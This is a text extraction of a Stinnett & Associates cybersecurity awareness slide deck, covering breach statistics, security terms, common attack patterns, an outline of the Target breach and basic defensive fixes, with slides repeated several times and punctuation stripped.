and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
